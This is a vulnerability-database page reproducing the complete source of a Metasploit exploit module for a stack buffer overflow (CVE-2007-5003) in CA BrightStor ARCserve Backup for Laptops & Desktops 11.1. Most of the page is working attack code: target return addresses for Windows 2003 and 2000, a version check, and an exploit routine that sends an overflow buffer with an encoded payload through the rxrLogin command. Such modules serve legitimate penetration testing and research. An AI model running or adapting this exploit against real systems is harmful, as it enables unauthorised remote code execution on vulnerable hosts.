Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
metasploitMC <[email protected]>MSF:EXPLOIT-WINDOWS-BRIGHTSTOR-LGSERVER_RXRLOGIN-
HistoryMay 05, 2008 - 11:27 p.m.

CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow

2008-05-0523:27:33
MC <[email protected]>
www.rapid7.com
16
JSON

This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
        for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could
        overflow the buffer and execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-5003' ],
          [ 'OSVDB', '41353' ],
          [ 'BID', '24348' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 550,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      'Platform' => 'win',
      'Targets'  =>
          [
            [ 'Windows 2003 SP0 English',     { 'Ret' => 0x71ae1f9b } ], # JMP ESP wshtcpip.dll
            [ 'Windows 2000 SP4 English',     { 'Ret' => 0x7c30d043 } ], # JMP ESP advapi32.dll
          ],
      'DisclosureDate' => '2007-06-06',
      'DefaultTarget' => 0))

    register_options([ Opt::RPORT(1900) ])
  end

  def check
    connect

    sock.put("0000000019rxrGetServerVersion")
    ver = sock.get_once

    disconnect

    if ( ver and ver =~ /11\.1\.742/ )
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    buffer =  rand_text_alpha_upper(17420) + [target.ret].pack('V')
    buffer << payload.encoded + rand_text_alpha_upper(300)

    sploit  = "0000018124" # Command Length Field
    sploit << "rxrLogin"   # RPC Command
    sploit <<  "~~"        # Constant Argument Delimiter
    sploit <<  buffer      # Argument

    print_status("Trying target #{target.name}...")
    # One-shot overwrite...
    sock.put(sploit)

    handler
    disconnect
  end
end
JSON